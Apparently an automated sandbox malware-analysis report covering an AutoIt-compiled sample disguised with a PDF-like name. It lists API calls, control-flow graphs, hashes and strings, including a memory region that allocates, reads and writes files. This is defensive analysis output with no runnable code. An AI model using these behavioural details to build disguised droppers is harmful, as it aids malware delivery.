                                                    • Instruction Fuzzy Hash: 0C918F71504705AFCB26EB54C851F9BB3E8BF84310F048969F9599F2A1DB30FA48CB92
                                                    Function 00343F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00343F86
                                                    • RegisterClassExW.USER32(00000030), ref: 00343FB0
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00343FC1
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00343FDE
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00343FEE
                                                    • LoadIconW.USER32(000000A9), ref: 00344004
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00344013
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: f80101c7f65b2713eea8450ba10a26070d18b024f7643de19f7e61b6307807af
                                                    • Instruction ID: 0deda29dace51c6f5087e468232a98cac97113b7fdadd831e53ab1414084c8b4
                                                    • Opcode Fuzzy Hash: f80101c7f65b2713eea8450ba10a26070d18b024f7643de19f7e61b6307807af
                                                    • Instruction Fuzzy Hash: 1821C3B5D00218AFDB01DFA4ED89BCDBBB8FB08704F00462AFA15F62A0D7B555448F95
                                                    Function 0038BFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0038BDB4: __time64.LIBCMT ref: 0038BDBE
                                                      • Part of subcall function 00344517: _fseek.LIBCMT ref: 0034452F
                                                    • __wsplitpath.LIBCMT ref: 0038C083
                                                      • Part of subcall function 00361DFC: __wsplitpath_helper.LIBCMT ref: 00361E3C
                                                    • _wcscpy.LIBCMT ref: 0038C096
                                                    • _wcscat.LIBCMT ref: 0038C0A9
                                                    • __wsplitpath.LIBCMT ref: 0038C0CE
                                                    • _wcscat.LIBCMT ref: 0038C0E4
                                                    • _wcscat.LIBCMT ref: 0038C0F7
                                                    • _wcscmp.LIBCMT ref: 0038C03E
                                                      • Part of subcall function 0038C56D: _wcscmp.LIBCMT ref: 0038C65D
                                                      • Part of subcall function 0038C56D: _wcscmp.LIBCMT ref: 0038C670
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0038C2A1
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0038C338
                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0038C34E
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0038C35F
                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0038C371
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                    • String ID:
                                                    • API String ID: 2378138488-0
                                                    • Opcode ID: 6eb0aafd265052c9627ba9bac05517b7c6f9af0b39ffc9fe82b2541ad4b2ee0e
                                                    • Instruction ID: d475434a2d69d191c6974367186c10fbd553942a8890b3995645e6773e26bd41
                                                    • Opcode Fuzzy Hash: 6eb0aafd265052c9627ba9bac05517b7c6f9af0b39ffc9fe82b2541ad4b2ee0e
                                                    • Instruction Fuzzy Hash: CAC10AB1910219AFDF12EF95CC85EDEB7BDAF49310F1080A6F609EA151DB70AA448F61
                                                    Function 00343742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 957 343742-343762 959 343764-343767 957->959 960 3437c2-3437c4 957->960 961 3437c8 959->961 962 343769-343770 959->962 960->959 963 3437c6 960->963 965 3437ce-3437d1 961->965 966 3b1e00-3b1e2e call 342ff6 call 35e312 961->966 967 343776-34377b 962->967 968 34382c-343834 PostQuitMessage 962->968 964 3437ab-3437b3 DefWindowProcW 963->964 975 3437b9-3437bf 964->975 969 3437f6-34381d SetTimer RegisterWindowMessageW 965->969 970 3437d3-3437d4 965->970 1004 3b1e33-3b1e3a 966->1004 972 3b1e88-3b1e9c call 384ddd 967->972 973 343781-343783 967->973 974 3437f2-3437f4 968->974 969->974 979 34381f-34382a CreatePopupMenu 969->979 976 3b1da3-3b1da6 970->976 977 3437da-3437ed KillTimer call 343847 call 34390f 970->977 972->974 998 3b1ea2 972->998 980 343836-343840 call 35eb83 973->980 981 343789-34378e 973->981 974->975 989 3b1da8-3b1daa 976->989 990 3b1ddc-3b1dfb MoveWindow 976->990 977->974 979->974 999 343845 980->999 985 343794-343799 981->985 986 3b1e6d-3b1e74 981->986 996 3b1e58-3b1e68 call 3855bd 985->996 997 34379f-3437a5 985->997 986->964 994 3b1e7a-3b1e83 call 37a5f3 986->994 991 3b1dcb-3b1dd7 SetFocus 989->991 992 3b1dac-3b1daf 989->992 990->974 991->974 992->997 1000 3b1db5-3b1dc6 call 342ff6 992->1000 994->964 996->974 997->964 997->1004 998->964 999->974 1000->974 1004->964 1008 3b1e40-3b1e53 call 343847 call 344ffc 1004->1008 1008->964
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 003437B3
                                                    • KillTimer.USER32(?,00000001), ref: 003437DD
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00343800
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0034380B
                                                    • CreatePopupMenu.USER32 ref: 0034381F
                                                    • PostQuitMessage.USER32(00000000), ref: 0034382E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: 88f77f77c42c998587deb3fe11b781cac6e5931c974150bee98667b975fa7fb5
                                                    • Instruction ID: b785c39d9c0028f5c44d7fda5d52794be18fab22e2ff98e0e055402a8036320e
                                                    • Opcode Fuzzy Hash: 88f77f77c42c998587deb3fe11b781cac6e5931c974150bee98667b975fa7fb5
                                                    • Instruction Fuzzy Hash: A74128F1104245A7DB176B689D4AFBA3AD9F704300F400135FA82EF9E1CB75BE509766
                                                    Function 00343E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00343E79
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00343E88
                                                    • LoadIconW.USER32(00000063), ref: 00343E9E
                                                    • LoadIconW.USER32(000000A4), ref: 00343EB0
                                                    • LoadIconW.USER32(000000A2), ref: 00343EC2
                                                      • Part of subcall function 00344024: LoadImageW.USER32(00340000,00000063,00000001,00000010,00000010,00000000), ref: 00344048
                                                    • RegisterClassExW.USER32(?), ref: 00343F30
                                                      • Part of subcall function 00343F53: GetSysColorBrush.USER32(0000000F), ref: 00343F86
                                                      • Part of subcall function 00343F53: RegisterClassExW.USER32(00000030), ref: 00343FB0
                                                      • Part of subcall function 00343F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00343FC1
                                                      • Part of subcall function 00343F53: InitCommonControlsEx.COMCTL32(?), ref: 00343FDE
                                                      • Part of subcall function 00343F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00343FEE
                                                      • Part of subcall function 00343F53: LoadIconW.USER32(000000A9), ref: 00344004
                                                      • Part of subcall function 00343F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00344013
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: 167f9b0ba66f416378e67e6aebd09129ad25c19e9fc4a80a6fd35123a825fb64
                                                    • Instruction ID: 2f27ed00f3e4d5891fdca08c945ff3753f6e8bedd5911421caa425f091fe50ba
                                                    • Opcode Fuzzy Hash: 167f9b0ba66f416378e67e6aebd09129ad25c19e9fc4a80a6fd35123a825fb64
                                                    • Instruction Fuzzy Hash: E92130B0D00304ABCB05DFA9ED49A99BFF9FB48310F00813AE618BB2B1D77556448F95
                                                    Function 00CEBA88 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1076 ceba88-cebada call ceb988 CreateFileW 1079 cebadc-cebade 1076->1079 1080 cebae3-cebaf0 1076->1080 1081 cebc3c-cebc40 1079->1081 1083 cebaf2-cebafe 1080->1083 1084 cebb03-cebb1a VirtualAlloc 1080->1084 1083->1081 1085 cebb1c-cebb1e 1084->1085 1086 cebb23-cebb49 CreateFileW 1084->1086 1085->1081 1088 cebb6d-cebb87 ReadFile 1086->1088 1089 cebb4b-cebb68 1086->1089 1090 cebbab-cebbaf 1088->1090 1091 cebb89-cebba6 1088->1091 1089->1081 1092 cebbd0-cebbe7 WriteFile 1090->1092 1093 cebbb1-cebbce 1090->1093 1091->1081 1095 cebbe9-cebc10 1092->1095 1096 cebc12-cebc37 CloseHandle VirtualFree 1092->1096 1093->1081 1095->1081 1096->1081
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00CEBACD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                    • Instruction ID: 9d6c785d0e73e507e9da868de77dc7eb8bc45757de2ce0a238a6323553fa391c
                                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                    • Instruction Fuzzy Hash: 14510575A50248FBEB20DFA1CC49FEF77B8BF48700F608554F61AEA180DB749A459B60
                                                    Function 003449FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1106 3449fb-344a25 call 34bcce RegOpenKeyExW 1109 3b41cc-3b41e3 RegQueryValueExW 1106->1109 1110 344a2b-344a2f 1106->1110 1111 3b4246-3b424f RegCloseKey 1109->1111 1112 3b41e5-3b4222 call 35f4ea call 3447b7 RegQueryValueExW 1109->1112 1117 3b423d-3b4245 call 3447e2 1112->1117 1118 3b4224-3b423b call 346a63 1112->1118 1117->1111 1118->1117
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00344A1D
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003B41DB
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003B421A
                                                    • RegCloseKey.ADVAPI32(?), ref: 003B4249
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$CloseOpen
                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                    • API String ID: 1586453840-614718249
                                                    • Opcode ID: 08bfb66b85a6b29ed4ff1a7896cb4d3cfb899b70bce90a1d76887788181691cf
                                                    • Instruction ID: 83aecc328673749cf21872a1dcdedc84091510207cd45b0767f8a64b1e0595bd
                                                    • Opcode Fuzzy Hash: 08bfb66b85a6b29ed4ff1a7896cb4d3cfb899b70bce90a1d76887788181691cf
                                                    • Instruction Fuzzy Hash: 30113071600118BEDB06ABA8DD86DEF7BBCEF04344F104465F506DB1A1EA70AE029750
                                                    Function 003436B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1133 3436b8-343728 CreateWindowExW * 2 ShowWindow * 2
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003436E6
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343707
                                                    • ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 0034371B
                                                    • ShowWindow.USER32(00000000,?,?,?,?,00343AA3,?), ref: 00343724
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: da2d54dc00111232066e91e77f11d65441b8cdcab9fab127442291f42032d7fa
                                                    • Instruction ID: 4469ade2387670fb44cd185170a343d3c8fc81b2b1fa9add48383e17fba4a829
                                                    • Opcode Fuzzy Hash: da2d54dc00111232066e91e77f11d65441b8cdcab9fab127442291f42032d7fa
                                                    • Instruction Fuzzy Hash: 29F03A755402D07AE7325B57AD88E673EBDD7C6F20F01802FBA04A22B0C5711891CAB4
                                                    Function 00344A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00345374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00401148,?,003461FF,?,00000000,00000001,00000000), ref: 00345392
                                                      • Part of subcall function 003449FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00344A1D
                                                    • _wcscat.LIBCMT ref: 003B2D80
                                                    • _wcscat.LIBCMT ref: 003B2DB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileModuleNameOpen
                                                    • String ID: 8!@$\$\Include\
                                                    • API String ID: 3592542968-3569967281
                                                    • Opcode ID: 0e0236962267ec3f1924fca600e3910efc139a7a5e11f2a4f3dc3487bc97844c
                                                    • Instruction ID: 97039120fc25f0bc19bead32d4d8fd09755ba185df4e11ee3b4a603f361af9d6
                                                    • Opcode Fuzzy Hash: 0e0236962267ec3f1924fca600e3910efc139a7a5e11f2a4f3dc3487bc97844c
                                                    • Instruction Fuzzy Hash: F85182754143408BC706EF55EB8699BB7F8FF49300B40453EF684AF2A1DBB09608CB5A
                                                    Function 00344139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1291 344139-344160 call 3441a9 1294 3b3489-3b3499 call 38c396 1291->1294 1295 344166-344174 call 3441a9 1291->1295 1299 3b349e-3b34a0 1294->1299 1295->1294 1300 34417a-344180 1295->1300 1301 3b34bf-3b3507 call 35f4ea 1299->1301 1302 3b34a2-3b34a5 call 344252 1299->1302 1304 3b34aa-3b34b9 call 386b49 1300->1304 1305 344186-3441a6 call 34c833 1300->1305 1311 3b3509-3b3526 call 34496c 1301->1311 1312 3b3528 1301->1312 1302->1304 1304->1301 1315 3b352a-3b353d 1311->1315 1312->1315 1317 3b3543 1315->1317 1318 3b36b4-3b36b7 call 361c9d 1315->1318 1320 3b354a-3b354d call 344f30 1317->1320 1321 3b36bc-3b36c5 call 344252 1318->1321 1324 3b3552-3b3574 call 34bbfc call 389cab 1320->1324 1328 3b36c7-3b36d7 call 344f11 call 35d8f5 1321->1328 1333 3b3588-3b3592 call 389c95 1324->1333 1334 3b3576-3b3583 1324->1334 1341 3b36dc-3b370c call 3825b5 call 35f55e call 361c9d call 344252 1328->1341 1343 3b35ac-3b35b6 call 389c7f 1333->1343 1344 3b3594-3b35a7 1333->1344 1337 3b367b-3b368b call 34ba85 1334->1337 1337->1324 1346 3b3691-3b369b call 344dd9 1337->1346 1341->1328 1353 3b35ca-3b35d4 call 35d90c 1343->1353 1354 3b35b8-3b35c5 1343->1354 1344->1337 1352 3b36a0-3b36ae 1346->1352 1352->1318 1352->1320 1353->1337 1359 3b35da-3b35f2 call 382551 1353->1359 1354->1337 1365 3b3615-3b3618 1359->1365 1366 3b35f4-3b3613 call 34ce19 call 34cb37 1359->1366 1368 3b361a-3b3635 call 34ce19 call 35c2a5 call 34cb37 1365->1368 1369 3b3646-3b3649 1365->1369 1390 3b3636-3b3644 call 34bbfc 1366->1390 1368->1390 1371 3b364b-3b3654 call 382472 1369->1371 1372 3b3669-3b366c call 389c12 1369->1372 1371->1341 1382 3b365a-3b3664 call 35f55e 1371->1382 1379 3b3671-3b367a call 35f55e 1372->1379 1379->1337 1382->1324 1390->1379
                                                    APIs
                                                      • Part of subcall function 003441A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003439FE,?,00000001), ref: 003441DB
                                                    • _free.LIBCMT ref: 003B36B7
                                                    • _free.LIBCMT ref: 003B36FE
                                                      • Part of subcall function 0034C833: __wsplitpath.LIBCMT ref: 0034C93E
                                                      • Part of subcall function 0034C833: _wcscpy.LIBCMT ref: 0034C953
                                                      • Part of subcall function 0034C833: _wcscat.LIBCMT ref: 0034C968
                                                      • Part of subcall function 0034C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0034C978
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                    • API String ID: 805182592-1757145024
                                                    • Opcode ID: c42cf7c652a81b1610b424ef0a743d86c4788063d80a79d42577633149b6600c
                                                    • Instruction ID: 27e2171fe906ecae19c56f06a133c1fb902f2d66eb0ff333fa93b0583d0b68b3
                                                    • Opcode Fuzzy Hash: c42cf7c652a81b1610b424ef0a743d86c4788063d80a79d42577633149b6600c
                                                    • Instruction Fuzzy Hash: 52918271910229AFCF16EFA4CC91AEDB7B4FF05314F10442AF916AF691DB70AA04CB50
                                                    Function 00CED518 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CED408: Sleep.KERNELBASE(000001F4), ref: 00CED419
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00CED649
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845689753.0000000000CEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CEB000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ceb000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: O49OP75CAF49LLVF91VB
                                                    • API String ID: 2694422964-1611005959
                                                    • Opcode ID: 82b0282d8d7a8893d79d94d940bceddb80ae3f1b3e149a5a00e36b382db90dc2
                                                    • Instruction ID: afe02132b4ad676b89cc0bed92d72ac03a538a60ef99883ff2c7ae138e44c192
                                                    • Opcode Fuzzy Hash: 82b0282d8d7a8893d79d94d940bceddb80ae3f1b3e149a5a00e36b382db90dc2
                                                    • Instruction Fuzzy Hash: EB51C270D04289DBEF11DBE4C955BEEBB79AF18300F004199E609BB2C1D7B91B45CBA6
                                                    Function 003440E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 003B3725
                                                    • GetOpenFileNameW.COMDLG32 ref: 003B376F
                                                      • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                                      • Part of subcall function 003440A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003440C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                    • String ID: X$t3?
                                                    • API String ID: 3777226403-4041524223
                                                    • Opcode ID: ad7d4cf360d84ef97ec4d2d0dfab70388fe4c85106e1112613bf26b2f7e874bb
                                                    • Instruction ID: 971075d06acaf7fd3536dbcb2df73869b777bf38af95bcb0f1022e3102a71a6a
                                                    • Opcode Fuzzy Hash: ad7d4cf360d84ef97ec4d2d0dfab70388fe4c85106e1112613bf26b2f7e874bb
                                                    • Instruction Fuzzy Hash: 142169719101989BDB03DF94D8457EE77F99F49304F004069E505AF241DBB466898F55
                                                    Function 003634AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __getstream.LIBCMT ref: 003634FE
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00363539
                                                    • __wopenfile.LIBCMT ref: 00363549
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
